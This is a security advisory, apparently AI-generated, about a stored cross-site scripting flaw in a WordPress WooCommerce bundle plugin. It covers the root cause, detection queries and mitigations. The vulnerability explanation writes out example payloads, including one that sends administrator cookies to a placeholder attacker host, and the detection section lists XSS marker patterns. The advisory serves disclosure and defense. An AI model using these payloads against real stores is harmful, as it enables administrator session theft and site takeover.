CVE-2026-93836 Overview
CVE-2026-93836 is a stored Cross-Site Scripting (XSS) vulnerability [CWE-79] in the WPC Product Bundles for WooCommerce plugin for WordPress. The flaw affects all plugin versions up to and including 8.6.6. Unauthenticated attackers can inject arbitrary JavaScript through the qty parameter due to insufficient input sanitization and output escaping. The injected script executes in the browser of any user who accesses an affected page, including administrators reviewing order details.
Critical Impact
Unauthenticated attackers can inject persistent JavaScript into order item metadata, enabling session theft, administrative account takeover, and site defacement when staff view affected orders.
Affected Products
- WPC Product Bundles for WooCommerce plugin for WordPress
- All plugin versions up to and including 8.6.6
- WordPress sites running WooCommerce with the vulnerable bundle plugin enabled
Discovery Timeline
- 2026-09-22 - CVE-2026-93836 published to the National Vulnerability Database
- 2026-09-22 - Last updated in NVD database
Technical Details for CVE-2026-93836
Vulnerability Analysis
The vulnerability resides in the quantity handling logic of the WPC Product Bundles for WooCommerce plugin. During validation of the qty parameter, the plugin performs a PHP float cast on user-supplied input. This cast extracts the leading numeric value but silently discards the remainder of the string during comparison, while the original raw value is preserved and stored.
An attacker submits a payload such as 1<img src=x onerror=alert(1)> through the bundle add-to-cart flow. The float cast evaluates the value as 1, satisfying quantity validation checks. The unsanitized string is then written verbatim into WooCommerce order item metadata under the _woosb_ids key. When a store administrator or another user views the order in the WordPress admin dashboard or a rendered storefront page, the browser parses the HTML and executes the injected script.
Root Cause
The root cause is a type-coercion validation bypass combined with missing output escaping. Numeric validation using floatval() is not a sanitization primitive and does not remove HTML or JavaScript content trailing the numeric prefix. The plugin also fails to apply WordPress escaping functions such as esc_html() or esc_attr() at output time, allowing the stored payload to render as active markup.
Attack Vector
The attack is network-reachable and requires no authentication or user interaction from the attacker's side. An unauthenticated visitor submits a crafted bundle purchase request containing a malicious qty value. The payload persists in order metadata and triggers whenever any user loads a page that renders the affected order data, resulting in a scope change from the store frontend to authenticated administrative sessions.
Code paths implicated in the vulnerability are documented in the plugin source at class-woosb.php line 579, class-woosb.php line 584, class-woosb.php line 1197, and class-backend.php line 1949.
// Vulnerability mechanism (prose description)
// 1. Attacker submits qty = "1<img src=x onerror=fetch('//attacker/'+document.cookie)>"
// 2. Plugin performs (float) $qty which evaluates to 1.0 - validation passes
// 3. Original raw string is stored in wp_woocommerce_order_itemmeta under _woosb_ids
// 4. Admin views order -> stored HTML renders -> onerror handler executes in admin context
Detection Methods for CVE-2026-93836
Indicators of Compromise
- Order item metadata rows in wp_woocommerce_order_itemmeta where meta_key = '_woosb_ids' contain angle brackets, <script, onerror=, onload=, or javascript: substrings.
- HTTP POST requests to WooCommerce add-to-cart or bundle configuration endpoints with qty parameter values that begin with a digit followed by HTML tags.
- Outbound requests from administrator browsers to unfamiliar domains shortly after opening WooCommerce order detail pages.
Detection Strategies
- Query the WooCommerce order item metadata table for values under _woosb_ids that do not match a strict numeric or ID-list pattern.
- Deploy WordPress or WAF rules that inspect the qty request parameter for non-numeric characters and block or log matches.
- Review web server access logs for POST bodies containing common XSS payload markers targeting bundle product endpoints.
Monitoring Recommendations
- Monitor administrator session activity for unexpected script-driven navigation, cookie exfiltration, or new administrator account creation.
- Alert on modifications to WordPress user roles or the wp_users table following access to bundle order pages.
- Track plugin version inventory across managed WordPress sites and flag any instance of WPC Product Bundles at version 8.6.6 or earlier.
How to Mitigate CVE-2026-93836
Immediate Actions Required
- Update the WPC Product Bundles for WooCommerce plugin to a version later than 8.6.6 as soon as the vendor publishes a fixed release.
- Audit existing WooCommerce orders for malicious content in _woosb_ids metadata and sanitize or remove affected entries.
- Rotate administrator credentials and invalidate active sessions if evidence of exploitation is present.
Patch Information
Refer to the WordPress plugin changeset for the vendor code changes and the Wordfence vulnerability report for advisory details. Apply the patched plugin version through the WordPress admin plugin updater or WP-CLI.
Workarounds
- Deploy a Web Application Firewall rule that rejects requests where the qty parameter contains characters outside [0-9.].
- Temporarily disable the WPC Product Bundles plugin on production stores until the patched version is installed.
- Restrict access to the WordPress admin area by IP allowlisting to reduce exposure of administrators to stored payloads.
# Update the plugin via WP-CLI once a fixed version is available
wp plugin update woo-product-bundle
# Verify installed version
wp plugin get woo-product-bundle --field=version
# Search order item metadata for suspicious _woosb_ids values
wp db query "SELECT order_item_id, meta_value FROM wp_woocommerce_order_itemmeta \
WHERE meta_key = '_woosb_ids' AND meta_value REGEXP '[<>\"\\']';"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
